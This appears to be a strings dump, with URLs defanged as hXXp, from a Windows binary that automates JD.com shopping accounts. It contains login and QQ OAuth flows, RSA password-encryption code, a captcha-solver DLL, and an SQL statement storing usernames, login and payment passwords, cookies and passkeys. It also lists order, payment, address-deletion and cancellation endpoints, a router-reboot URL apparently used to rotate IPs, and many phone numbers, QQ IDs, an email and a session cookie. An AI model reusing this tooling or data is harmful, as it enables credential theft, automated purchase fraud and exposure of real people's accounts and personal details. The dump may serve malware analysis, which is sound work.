&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://api.m.jd.com/client.action?functionId=genToken&uuid=
application/x-www-form-urlencoded; charset=UTF-8
error_msg
tokenKey
hXXp://un.m.jd.com/cgi-bin/app/appjmp?tokenKey=
hXXp://218.249.47.94/Xianghe/MTK_Phone_KK_UAprofile.xml
;Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; A0001 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
jdapp;android;4.1.0;4.3;
skuId=
hXXp://trade.jd.com/shopping/dynamic/consignee/getCitys.action
consigneeParam.provinceId=
hXXp://trade.jd.com/shopping/dynamic/consignee/getCountys.action
consigneeParam.cityId=
hXXp://trade.jd.com/shopping/dynamic/consignee/getTowns.action
consigneeParam.countyId=
function time(){return Math.random()}
hXXp://zt.m.jd.com/funding/m_load_address.action?Id=
hXXp://zt.m.jd.com/funding/m_save_address.action
;network/wifi;Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; A0001 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
hXXp://mt.z.jd.com/funding/m_load_address.action?redoundId=
INSERT INTO JDorder (username,loginpwd,paypwd,cookie,status,orderId,totalprice,orderTime,name,phone,area,addr,productId_num,payDetail,Ecard,PASSKEY) VALUES ('{username}','{loginpwd}','{paypwd}','{cookie}','{status}','{orderId}',{totalprice},'{orderTime}','{name}','{phone}','{area}','{addr}','{productId_num}','{payDetail}','{Ecard}','{PASSKEY}')
{loginpwd}
{PASSKEY}
hXXp://zcashier.jd.com/funding/p/toCashier.action?orderId=
hXXp://trade.jr.jd.com/trade/tradebuy.action
hXXps://passport.jd.com/new/login.aspx
formlogin" method="post
hXXps://passport.jd.com/uc/rememberMeCheck?r=
application/x-www-form-urlencoded; charset=utf-8
loginName=
hXXps://passport.jd.com/uc/showAuthCode?r=
hXXps://authcode.jd.com/verify/image?a=1&acid=
hXXps://passport.jd.com/uc/showAuthCode?r=0.85103915524766
&loginpwd=
&nloginpwd=
loginname=
hXXps://passport.jd.com/uc/loginService?uuid=
&pt_randsalt=0&u1=https://graph.qq.com/oauth/login_jump&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=5-4-1452071901867&js_ver=10145&js_type=1&login_sig=zFfNcYVY2N-CQQBU4QFtSvxRvWU6SgSStk1YdiRrh*cnIIoE8qrNkd4SGmMVnL4H&pt_uistyle=33&aid=716027609&daid=383&pt_3rd_aid=100273020&
hXXps://ssl.ptlogin2.qq.com/login?u=
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
skey
hXXps://graph.qq.com/oauth2.0/authorize
hXXps://graph.qq.com/oauth/show?which=Login&display=pc&response_type=code&client_id=100273020&redirect_uri=hXXp://qq.jd.com/new/qq/callback.action
response_type=code&client_id=100273020&redirect_uri=http://qq.jd.com/new/qq/callback.action&scope=&state=&src=1&update_auth=1&openapi=80901010&g_tk=
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
loginsubmit
hXXp://authcode.jd.com/verify/image?a=1&acid=
hXXp://qq.jd.com/new/bindExistAccount.action?uuid=
&loginname=
hXXp://safe.jd.com/union/index.action
hXXp://safe.jd.com/user/paymentpassword/safetyCenter.action
hXXp://safe.jd.com/union/doUnBind?t=
hXXp://safe.jd.com/union/index.action?t=
wq_skey
wq_skey=
hXXp://wq.jd.com/bases/myindex/getindvdata?callback=myData&t=
Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; InFocus M310 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 V1_AND_SQ_5.4.0_218_YYB_D QQ/5.4.1.2395 NetType/WIFI
login error
hXXp://wq.jd.com/user/info/QueryJDUserInfo?sceneid=
hXXp://wqs.jd.com/my/indexv2.shtml?PTAG=37128.9.4&shownav=1
no login
base.TipUrl
hXXp://wq.jd.com/pinbind/accountInfo?sceneid=
currPinInfo.pinType
currPinInfo.pin
].pinType
].pin
wqs.jd.com/my/accountv2.shtml?sceneid=11110&state=1&rurl=
wqs.jd.com/my/accountv2.shtml
hXXp://wq.jd.com/pinbind/unbind?sceneid=11110&fromtype=
com.tencent.mobileqq
hXXp://sq.jr.jd.com/cm_focus/focus?key=1000&systemId=
hXXp://z.jd.com/project/details/
hXXp://sq.jr.jd.com/cm/praise?key=1000&systemId=
hXXp://trade-z.jd.com/funding/support_project.action?projectId=
&o=trade-z.jd.com/funding/support_project.action
hXXp://payrisk.jd.com/y.html?v=
hXXp://trade-z.jd.com/funding/project_subscribe.action
hXXp://trade-z.jd.com/funding/save_address.action
hXXp://trade-z.jd.com/funding/update_address.action
address.id
ip.txt
hXXp://VVV.net.cn/static/customercare/yourip.asp
LoginURL
hXXp://
LoginPOST
LoginRefer
{"method":"do","login":{"password":"
{password}
DisconnURL
ConnURL
network.wan_status.ipaddr
0.0.0.0
"0.0.0.0"
len1 = input1.length;
len2 = input2.length;
lenDict = dictionary.length;
cr = input2.charCodeAt(index);
cl = input1.charCodeAt(index);
output  = dictionary.charAt((cl ^ cr)%lenDict);
*.txt
hXXp://VVV.178hui.com/index.php?rec=20686
hXXp://VVV.51bi.com/siteAward/i_32035343/?key=62-b7fb-4a41-bb8
hXXps://media.jd.com/
hXXp://click2.yaoqing.com/ckvzjf
hXXp://api.m.jd.com/client.action?functionId=wait4Payment&uuid=
].orderId
].price
].orderType
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=jingdong&area=&networkType=wifi&sign=
hXXp://pay.m.jd.com/index.action?functionId=genAppPayId&uuid=
hXXps://pay.m.jd.com/pay/index.html?payId=
hXXp://qr.topscan.com/api.php?text=
].jpg
1752036:
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=jd-m&area=&networkType=wifi&st=
hXXp://api.m.jd.com/client.action?functionId=newOrderMessage&uuid=
].crateTime
].message
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=jd-m&area=&networkType=wifi&sign=
hXXp://api.m.jd.com/client.action?functionId=newOrderInfo&uuid=
orderInfo.checkCode
orderInfo.carrier
hXXp://order.jd.com/lazy/getOrderShowJson.action
error":"NotLogin
function timea(){var d,s;d=new Date();d.setTime('
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36
https:
hXXps://cashier.jd.com/
hXXp://order.jd.com/center/search.action?keyword=
hXXp://order.jd.com/center/list.action?s=1
&PassKey=.*?)"[\s\S]*?payment.pay.(action.id=
normal.item.action.(orderid=
&PassKey=.*?)"[\s\S]*?(cashier.jd.hk/payment\?PReq=.*?)"
hXXp://order.jd.com/lazy/getPopOrderInfo.action?callback=jsonp
(bankChoose_Common.action\?id=
(card.jd.com.{1,20}order_pay.action\?orderId=
(http.{0,1}:[^"]*?pay.*?)"
hXXp://pay.jd.com/payment/
hXXp://yuding.jd.com/ordersoa/presale/ordersbatch?jsonstr=
].orderid
].data.row1.d
].data.row1.operate
].data.row2.d
].data.row2.operate
hXXps://
hXXp://order.jd360.hk/normal/item.action?
hXXps://cashier.jd.com/payment/pay.
hXXp://order.jd.com/normal/item.action?
PASSKEY
applogin
wskey
hXXp://m.jd.com/
<img src="/ja.jsp
hXXp://m.jd.com/ja.jsp
hXXps://passport.m.jd.com/user/login.action?returnurl=hXXp://m.jd.com?indexloc=1
this.modulus = biCopy(a),
this.k = biHighIndex(this.modulus)   1;
b.digits[2 * this.k] = 1,
this.mu = biDivide(b, this.modulus),
this.bkplus1 = new BigInt,
this.bkplus1.digits[this.k   1] = 1,
this.modulo = BarrettMu_modulo,
this.multiplyMod = BarrettMu_multiplyMod,
this.powMod = BarrettMu_powMod
c = biMultiply(b, this.mu),
f = biMultiply(d, this.modulus),
h.isNeg && (h = biAdd(h, this.bkplus1));
for (var i = biCompare(h, this.modulus) >= 0; i;) h = biSubtract(h, this.modulus),
i = biCompare(h, this.modulus) >= 0;
return this.modulo(c)
c.digits[0] = 1;
if (0 != (1 & e.digits[0]) && (c = this.multiplyMod(c, d)), e = biShiftRight(e, 1), 0 == e.digits[0] && 0 == biHighIndex(e)) break;
d = this.multiplyMod(d, d)
for (var b = 0; b < ZERO_ARRAY.length; b  ) ZERO_ARRAY[b] = 0;
bigOne.digits[0] = 1
this.digits = "boolean" == typeof a && 1 == a ? null: ZERO_ARRAY.slice(0),
this.isNeg = !1
for (var b, c = "-" == a.charAt(0), d = c ? 1 : 0; d < a.length && "0" == a.charAt(d);)  d;
if (d == a.length) b = new BigInt;
var e = a.length - d,
for (0 == f && (f = dpl10), b = biFromNumber(Number(a.substr(d, f))), d  = f; d < a.length;) b = biAdd(biMultiply(b, lr10), biFromNumber(Number(a.substr(d, dpl10)))),
b.isNeg = c
return b.digits = a.digits.slice(0),
b.isNeg = a.isNeg,
b.isNeg = 0 > a,
a = Math.abs(a);
for (var c = 0; a > 0;) b.digits[c  ] = a & maxDigitVal,
c = a.length - 1; c > -1; --c) b  = a.charAt(c);
c.digits[0] = b;
for (var d = biDivideModulo(a, c), e = hexatrigesimalToChar[d[1].digits[0]]; 1 == biCompare(d[0], bigZero);) d = biDivideModulo(d[0], c),
digit = d[1].digits[0],
e  = hexatrigesimalToChar[d[1].digits[0]];
return (a.isNeg ? "-": "")   reverseStr(e)
b.digits[0] = 10;
for (var c = biDivideModulo(a, b), d = String(c[1].digits[0]); 1 == biCompare(c[0], bigZero);) c = biDivideModulo(c[0], b),
d  = String(c[1].digits[0]);
return (a.isNeg ? "-": "")   reverseStr(d)
c = (biHighIndex(a), biHighIndex(a)); c > -1; --c) b  = digitToHex(a.digits[c]);
c = Math.min(a.length, 4), d = 0; c > d;   d) b <<= 4,
b |= charToHex(a.charCodeAt(d));
c = a.length,
e = 0; d > 0; d -= 4,   e) b.digits[e] = hexToDigit(a.substr(Math.max(d - 4, 0), Math.min(d, 4)));
var c = "-" == a.charAt(0),
f.digits[0] = 1;
for (var g = a.length - 1; g >= d; g--) {
var h = a.charCodeAt(g),
return e.isNeg = c,
c = biHighIndex(a); c > -1; --c) b  = digitToBytes(a.digits[c]);
var b = String.fromCharCode(255 & a);
var c = String.fromCharCode(255 & a);
return (a.isNeg ? "-": "")   a.digits.join(" ")
if (a.isNeg != b.isNeg) b.isNeg = !b.isNeg,
b.isNeg = !b.isNeg;
f = 0; f < a.digits.length;   f) d = a.digits[f]   b.digits[f]   e,
c.digits[f] = 65535 & d,
c.isNeg = a.isNeg
for (var f = 0; f < a.digits.length;   f) d = a.digits[f] - b.digits[f]   e,
c.digits[f] < 0 && (c.digits[f]  = biRadix),
for (var f = 0; f < a.digits.length;   f) d = 0 - c.digits[f]   e,
c.digits[f] = 65535 & d,
c.digits[f] < 0 && (c.digits[f]  = biRadix),
c.isNeg = !a.isNeg
} else c.isNeg = a.isNeg
for (var b = a.digits.length - 1; b > 0 && 0 == a.digits[b];)--b;
d = a.digits[c],
for (c = 0, e = i, j = 0; j <= g;   j,   e) d = f.digits[e]   a.digits[j] * b.digits[i]   c,
f.digits[e] = d & maxDigitVal,
f.digits[i   g   1] = c
return f.isNeg = a.isNeg != b.isNeg,
for (var f = 0; c >= f;   f) e = result.digits[f]   a.digits[f] * b   d,
result.digits[f] = e & maxDigitVal,
return result.digits[1   c] = d,
for (var f = Math.min(b   e, a.length), g = b, h = d; f > g;   g,   h) c[h] = a[g]
var c = Math.floor(b / bitsPerDigit),
arrayCopy(a.digits, 0, d.digits, c, d.digits.length - c);
g = d.digits.length - 1,
h = g - 1; g > 0; --g, --h) d.digits[g] = d.digits[g] << e & maxDigitVal | (d.digits[h] & highBitMasks[e]) >>> f;
return d.digits[0] = d.digits[g] << e & maxDigitVal,
d.isNeg = a.isNeg,
arrayCopy(a.digits, c, d.digits, 0, a.digits.length - c);
h = g   1; g < d.digits.length - 1;   g,   h) d.digits[g] = d.digits[g] >>> e | (d.digits[h] & lowBitMasks[e]) << f;
return d.digits[d.digits.length - 1] >>>= e,
return arrayCopy(a.digits, 0, c.digits, b, c.digits.length - b),
return arrayCopy(a.digits, b, c.digits, 0, c.digits.length - b),
return arrayCopy(a.digits, 0, c.digits, 0, b),
if (a.isNeg != b.isNeg) return 1 - 2 * Number(a.isNeg);
for (var c = a.digits.length - 1; c >= 0; --c) if (a.digits[c] != b.digits[c]) return a.isNeg ? 1 - 2 * Number(a.digits[c] > b.digits[c]) : 1 - 2 * Number(a.digits[c] < b.digits[c]);
g = b.isNeg;
if (f > e) return a.isNeg ? (c = biCopy(bigOne), c.isNeg = !b.isNeg, a.isNeg = !1, b.isNeg = !1, d = biSubtract(b, a), a.isNeg = !0, b.isNeg = g) : (c = new BigInt, d = biCopy(a)),
for (var h = Math.ceil(f / bitsPerDigit) - 1, i = 0; b.digits[h] < biHalfRadix;) b = biShiftLeft(b, 1),
h = Math.ceil(f / bitsPerDigit) - 1;
for (var j = Math.ceil(e / bitsPerDigit) - 1, k = biMultiplyByRadixPower(b, j - h); - 1 != biCompare(d, k);)  c.digits[j - h],
var m = l >= d.digits.length ? 0 : d.digits[l],
n = l - 1 >= d.digits.length ? 0 : d.digits[l - 1],
o = l - 2 >= d.digits.length ? 0 : d.digits[l - 2],
p = h >= b.digits.length ? 0 : b.digits[h],
q = h - 1 >= b.digits.length ? 0 : b.digits[h - 1];
c.digits[l - h - 1] = m == p ? maxDigitVal: Math.floor((m * biRadix   n) / p);
for (var r = c.digits[l - h - 1] * (p * biRadix   q), s = m * biRadixSquared   (n * biRadix   o); r > s;)--c.digits[l - h - 1],
r = c.digits[l - h - 1] * (p * biRadix | q),
d = biSubtract(d, biMultiplyDigit(k, c.digits[l - h - 1])),
d.isNeg && (d = biAdd(d, k), --c.digits[l - h - 1])
c.isNeg = a.isNeg != g,
a.isNeg && (c = g ? biAdd(c, bigOne) : biSubtract(c, bigOne), b = biShiftRight(b, i), d = biSubtract(b, d)),
0 == d.digits[0] && 0 == biHighIndex(d) && (d.isNeg = !1),
if (0 != (1 & f.digits[0]) && (d = biMultiplyMod(d, e, c)), f = biShiftRight(f, 1), 0 == f.digits[0] && 0 == biHighIndex(f)) break;
function RSAKeyPair(a, b, c, d) {
this.chunkSize = "number" != typeof d ? 2 * biHighIndex(this.m) : d / 8,
this.radix = 16,
this.barrett = new BarrettMu(this.m)
p = b.length,
for (h = "string" == typeof c ? c == RSAAPP.NoPadding ? 1 : c == RSAAPP.PKCS1Padding ? 2 : 0 : 0, i = "string" == typeof d && d == RSAAPP.RawEncoding ? 1 : 0, 1 == h ? p > a.chunkSize && (p = a.chunkSize) : 2 == h && p > a.chunkSize - 11 && (p = a.chunkSize - 11), e = 0, f = 2 == h ? p - 1 : a.chunkSize - 1; p > e;) h ? o[f] = b.charCodeAt(e) : o[e] = b.charCodeAt(e),
for (1 == h && (e = 0), f = a.chunkSize - p % a.chunkSize; f > 0;) {
for (j = Math.floor(256 * Math.random()); ! j;) j = Math.floor(256 * Math.random());
for (2 == h && (o[p] = 0, o[a.chunkSize - 2] = 2, o[a.chunkSize - 1] = 0), k = o.length, e = 0; k > e; e  = a.chunkSize) {
for (l = new BigInt, f = 0, g = e; g < e   a.chunkSize;   f) l.digits[f] = o[g  ],
l.digits[f]  = o[g  ] << 8;
m = a.barrett.powMod(l, a.e),
n = 1 == i ? biToBytes(m) : 16 == a.radix ? biToHex(m) : biToString(m, a.radix),
var c, d, e, f, g = b.split(" "),
for (d = 0; d < g.length;   d) for (f = 16 == a.radix ? biFromHex(g[d]) : biFromString(g[d], a.radix), c = a.barrett.powMod(f, a.d), e = 0; e <= biHighIndex(c);   e) h  = String.fromCharCode(255 & c.digits[e], c.digits[e] >> 8);
return 0 == h.charCodeAt(h.length - 1) && (h = h.substring(0, h.length - 1)),
RSAAPP.NoPadding = "NoPadding",
RSAAPP.PKCS1Padding = "PKCS1Padding",
RSAAPP.RawEncoding = "RawEncoding",
RSAAPP.NumericEncoding = "NumericEncoding",
c = "hXXp://wlmonitor.m.jd.com/web_login_report?"   c.substring(1),
b.src = c
if ("object" == typeof c && null != c) for (var d in c)"object" == typeof c[d] ? (a[d] = c[d].length ? [] : {},
for (var b = location.search.substring(1), c = b.split("&"), d = {},
e = 0; e < c.length; e  ) {
var f = c[e].split("=");
var b = document.cookie.match(new RegExp("(^| )"   a   "=([^;]*)($|;)"));
loginName: "",
appVersion: "1.3.0",
//window.pl_report = e
function getPass(pass,pubkey){
var key = new RSAKeyPair("3", "10001", pubkey, 1024);
var c = Base64.btoa(encryptedString(key, pass, RSAAPP.PKCS1Padding, RSAAPP.RawEncoding));
if (/([^\u0000-\u00ff])/.test(s)) {
while (i < s.length) {
ascii = s.charCodeAt(i);
result.push(base64hash.charAt(ascii >> 2));
result.push(base64hash.charAt((prev & 3) << 4 | (ascii >> 4)));
result.push(base64hash.charAt((prev & 0x0f) << 2 | (ascii >> 6)));
result.push(base64hash.charAt(ascii & 0x3f));
result.push(base64hash.charAt((prev & 3) << 4));
result.push('==');
result.push(base64hash.charAt((prev & 0x0f) << 2));
result.push('=');
return result.join('');
s = s.replace(/\s|=/g, '');
cur = base64hash.indexOf(s.charAt(i));
result.push(String.fromCharCode(prev << 2 | cur >> 4));
result.push(String.fromCharCode((prev & 0x0f) << 4 | cur >> 2));
result.push(String.fromCharCode((prev & 3) << 6 | cur));
getPass
hXXps://plogin.m.jd.com/cgi-bin/m/authcode?mod=login
hXXps://plogin.m.jd.com/cgi-bin/m/domlogin
application/x-www-form-urlencoded; Charset=UTF-8
_bak.txt
hXXp://p.3.cn/prices/get?skuid=J_
Mozilla/4.0
hXXp://1111.ip138.com/ic.asp
hXXp://ip.proxyfire.net/ip.php
tcashier.jdpay.com
cashier.jd.com
pay.jd.com
[payUrl=
[chinabankPayUrl=
@Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3
.*?)['"]
(http.{0,1}:\/\/cashier.jd.com\/payment.*?
.*?)".*?
bankChoose_Common.action
instead_confirm.action
pay.jd.com/payment/bankChoose_Common.action
cashier.jd.com/payment/pay.action
https
cashier.jd.hk
hXXps://cashier.jd.hk/cashier/wechat
hXXps://cashier.jd.hk/cashier?token=
hXXps://cashier.jd.hk
hXXps://cashier.jd.hk/cashier/wechat?token=
hXXps://cashier.jd.com/payment/paymentConfirm.action?paySign=
hXXp://cashier.jd.com/payment/paymentConfirm.action
hXXps://mapi.wangyin.com/PayGate
hXXps://cashier.jd.com/payment/paymentConfirm.action
][chinabankPayUrl=
http:
].orderTyp
hXXps://pay.m.jd.com/newpay/index.action
payParamsObject.payChannelList
].channelName
payParamsObject.payChannelList[
].status
].balance
].baitiaoOrderPrice
hXXps://pay.m.jd.com/newpay/baiTiaoPayResult.action
installmentNum=1&password=
baiTiaoPayResult.isSuccess
baiTiaoPayResult.info
orderInfo.price
orderInfo.orderStatus
].amount
&PassKey=.{1,52}?)["']
order.jd.com\/normal\/item.action\?(orderid=
order.jd360.hk\/normal\/item.action\?(orderid=
passkey
hXXp://api.m.jd.com/client.action?functionId=thirdAddress&uuid=
hXXp://pe.3.cn/prices/mgets?callback=reaPriceCb&origin=4&skuids=
hXXp://pe.3.cn/prices/mgets?callback=reaPriceCb&origin=5&skuids=
C:\Windows\System32\systemvc.dll
ø__
<V2WO.XjW2%
EAUT32.dllI
$@15638236
7*s %d. (0x%X
IsBad.adPtr,9
lvrcpyn.nbal
.tiBy
t1lusShuI
AUrl
.RH(H1
KERNEL32.DLL
MSVCRT.dll
WININET.dll
GetUrlCacheEntryInfoA
AntiVC.dll
6.VOT,,f
1412341
oeL
dl%c<
B7.mv
4542352
%sff2
@ZS%U9
-v%X<
\Data\huoniu_cookie.mdb
}#5.0#0#
C:\Progr
@21.tlb
ID="{0D0A4A9E-A566-4678-84F5-0F6453B6DBDA}"
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
&H00000001={3832D640-CF90-11CF-8E43-00A0C9
2930726881
2636696609
201381685
201260775
3273270
201494267
3317239657
201299812
204661500(
201995144
201829618
2335735314
13928006026
[1242930*1]
2982065275
[904762*1]
9376165835 _
13570625555
[1462425*1]
201260775
9376149671
2821437085
123456789
18003617555
[999065*1]
2251088269
[1015683*1][732505*1]
3272256966
17007264933
[763749*1]
2239638269
9487339259
18686605052
[526928*1]
13591755579
[503201*1]
3286663522
9485365741
13512786331
[1250264*1]
9478913914"
13737673091
[328266*1]
9478949329"
328468316
[854234*6]
3290878242
[1082266*1]
[1522631641*17]
32300.00
3207073542
15304608777
[763751*17]
9560130136
13012155484
2960633086
9524866484 _
9524732199
2368336536
[695467*1][208399*1]
[695467*1]
9491175586
[905198*1]
9488117806
9487979523
9487899493
13510779427
[1238332*3]
15018097217
[1577292*1]
3092085361
13015542006
[1163863*3]
9569460688
[383756*1]
13530395139
[547729*4]
13975199715
9740125254
13975199491
[1238332*1][836677*1]
9722232555
9722145122
9722083441
9722081041
13476607992
3290812071
13728390383
[1419022*2]
2035846384
9780807646
[905174*3]
9780787802
9747268569
9747357940
9747257047
9747255179
9747254519
[206803*3]
[1180402*1]
[1476554*1][1476573*1]
13503100056
[1125083*1]
9837604250_[
[436666*1][836670*1]
0F3D-2DCF-20CE-CEE6(
)7CC7-1F5B-4CDB-CB22(
9837516230_[
15267093081
C600-F6C9-DBBE-08B8(
9837513102_[
pt2gguin=o0201381685; uin=o0201381685; skey=@6MZHo
[1089805*1]
201842638
[1400285*1]
3269527357
13251445154
[1118445*2]
2091323442
13156173748
[695466*1]
9635222488
13813239719
[1488247*1][1651087*1]
wei04668xiongyo@163.com
[1597988344*1]
3277635383
9438342103
[811629*1]
9372775139
18954680168
[854210*1]
[1125083*1][1364481*1]
8792021129
13733321666
[1184117722*1]
1031965481
9834565427
17256874570
40-3-504
[685890*1]
0181-ADD9-12FE-5D1C|
9747308346
)|7CC7-1F5B-4CDB-CB22(
9722239561 _
3248673032
[1130831*4]
3203644230
9569218714 _
9488065356
9487413530
9478920126"
9388506453
[854804*1]
13153540888
[854240*1]
[854210*60]
[854210*80]
[1364481*1]
13822990755
[1359446*1]
9837608105_[
9790324005 _
13290984998
9747273238
17007264833
9488075812
13022144979
9478938923"
154772820
9440236394 _
13075078109
[695467*1][526831*2]
3039710368
9440099259 _
692458721
9435971037
13469280430
[1238332*1]
9433712169
13095627624
[616587*1]
9388541527
2096613397
9721768790
3252214913
9718748318>
13026515985
[407901*1]
3287077061
[208399*1]
9491322442
9747307138
9747255935
9743861108
9743788066 _
9722224820
9722215252
9834570666
17256874569
9790320611
13510444929
_*.txt
\*.ini
v_getsignKey
v_getPCFUrlALL
v_getAPPFUrl
v_getKey2
v_getSkey
\CouponKey.ini
loginpwd
payURL
192.168.1.1
\UUWiseHelper.dll
E:\work\UUWiseHelper
\UUWiseHelper.pdb
WS2_32.dll
UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
zcÁ
0(1,10141
9 9<9@9`9
:-1014,URL
:-19011,
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=exun006&area=&networkType=wifi&sign=
hXXp://api.m.jd.com/client.action?functionId=easyBuyGetAddress&uuid=
body={}
hXXp://api.m.jd.com/client.action?functionId=easyBuyDeleteAddress&uuid=
hXXp://easybuy.jd.com/address/getEasyBuyList.action
hXXp://trade.jd.com/shopping/dynamic/consignee/deleteConsignee.action
hXXp://trade.jd.com/shopping/order/getOrderInfo.action?rid=
consigneeParam.id=
hXXp://easybuy.jd.com/address/deleteAddress.action
hXXp://easybuy.jd.com/address/getEasyBuyList.action#none
hXXp://trade.z.jd.com/funding/remove_address.action
hXXp://trade.z.jd.com/funding/support_project.action?projectId=19780&redoundId=77248&org=pc
&clientVersion=5.0.0&build=27662&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=1-1-0&networkType=wifi&sign=
hXXp://i.m.jd.com/client.action?functionId=cancleOrder&body=
hXXp://orderop.jd.com/toolbar_showCancelButtonListNew?callback=jQuery5839309&orderList=
passKey":"
url":"new/
&key=
hXXp://orderop.jd.com/
hXXp://orderop.jd.com/toolbar_getRefundType?callback=jsonp1411183792873&_=1411183792990&orderid=
hXXp://orderop.jd.com/toolbar_getOrderInfo?callback=jsonp1411183792875&_=1411183792992&orderid=
','cancelReason':'','refundType':1}
','cancelReasonId':'
','customPhNo':'
hXXp://orderop.jd.com/toolbar_cancelOrder?callback=jsonp1411182974969&_=1411182993229&action=cancelOrder&orderid=
cancelOrder.html?1&cancalText=0&isHaveGiftOrder=0
'}&_=
hXXp://orderop.jd.com/toolbar_cancelOrder?callback=jQuery4552199&action=cancelOrder&orderid=
hXXp://orderop.jd.com/toolbar_getRefundType?callback=jQuery4552199&orderid=
hXXp://odo.jd.com/oc/refundOrder.html?orderId=
hXXp://orderop.jd.com/toolbar_getOrderInfo?callback=jQuery9053785&orderid=
}&_=
","cancelReason":"","refundType":
","cancelReasonId":"
","customPhNo":"
hXXp://rps.fm.jd.com/rest/refund/refundDetailFromOrderCenter?orderId=
3,6,9..;
:1,4,7,10...
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
COMCTL32.dll
MSIMG32.dll
MSVFW32.dll
SkinH_EL.dll
hXXp://VVV.zolpay.com/links/1416A4729BC6D294
hXXp://jmall.jd.com/p64928.html
text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
[1979-2010]
hXXp://192.168.1.1/userRpm/SysRebootRpm.htm?Reboot=ÖØÆô·ÓÉÆ÷
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXp://jd-ex.com/
hXXp://jd-ex.com/validateCode/genateValidate.html?checkUuid=
hXXp://jd-ex.com/queryInfo/checkWaybillOrder.html
hXXp://jd-ex.com/queryInfo/waybillTrackInfo.html
.*?>0<.*?
1-72-2799
3-51035-39620
4-113-9775
5-142-42540
6-303-36780
7-412-3547
8-560-567
9-639-640
10-698-699
11-799-3240
12-904-905
13-1000-1002
14-1114-19787
15-1158-3412
16-1303-3483
17-1381-3583
18-1482-3606
19-1601-3633
20-1715-43114
21-1827-3505
22-1930-50947
23-2121-22466
24-2144-3906-51694
25-2235-2246
26-2951-2952-21168
27-2376-4343
28-2487-2488
29-2580-21652-51875
30-2628-2629
31-2652-36684
hXXp://p.egou.com/n?k=xxx&e=891879&t=hXXp://VVV.jd.com/
hXXp://VVV.jd.com
hXXp://ad.ta355.cn/r.php?rf=...
hXXp://count.chanet.com.cn/.....
hXXp://union.click.jd.com...
hXXp://VVV.178hui.com/---
hXXp://union.click.jd.com/...
hXXps://pay3.chinabank.com.cn/PayGate
hXXps://bgw.wangyin.com/GW/pay
hXXps://netpay.cmbchina.com/netpayment/BaseHttp.dll?PrePayC2
hXXps://netpay.cmbchina.com/netpayment/BaseHttp.dll?GenQRCode?ClientNo=
.idata
.edata
P.vmp0
`.vmp1
.reloc
P.rsrc
version.dll
shell32.dll
1e.ro4A
oleaut32.dll
H0.gW
comctl32.dll
advapi32.dll
gdi32.dll
d.jF/"
r#'%C
6.Xdp
g|$^.Cn
>.bM8
>Z.Ye
w4R`$p%s*
f.zo~L^
wsock32.dll
Ë.L@
l.sQ{
c-t{.FF
b#I".wM
e.ENZ
xip.tu
@>.vO
%FX2Fsi
qKT.jLka
3.LD7
Uq
G,.gd
<.cFF=j
&8.XMj
$~O.Ba
)].Wd
/_{M%U
Q%s6|
lVfeVg
 !%uO
mh.ud
m%Csn%
kq84.QaI
)f%fg
.SuDYw
K)`p.frC
*%s!%
aR.dDb&<y
.xk 4g
)%S{.
'U}.Ue
l%S(8x$!(
1L%UJ
.vtbw
.iA5N
yyhKa%S
d.Zd=#R
x0r%F{
.IPi)
Vj.jH
>M%X9
/8[<{~@ 
bc.lTk
ks_GetMsg
kssPlugin.dll
tole32.dll
\skuConfig.ini
[123456]
[123456|234567|345678]
[1][1|1][1|2|1]
hXXp://item.jd.com/782199.html]
hXXp://p.egou.com/n?k=2mLErnWFWlwLrI6H2mLErI6****--&e=891879&t=hXXp://VVV.jd.com/
hXXp://fun.51fanli.com/goshopapi/goout/?id=544&lc=shopdetail_goumai&tc=211023&tracking_id=1109161***&go=http://VVV.jd.com/&finalurl=http://union.click.jd.com/jdc?tracking_id=1109161***&e=104833247211023&p=AyIBZRprFDJWWA1FBCVbV0IUEEULRFRBSkAOClBMW0srBEtHU1oFUwNAMhM3VxxSEQQiB1QeUhcAEQJTGFsVAxEFZXopJQ==&t=W1dCFBBFC0RUQUpADgpQTFtL
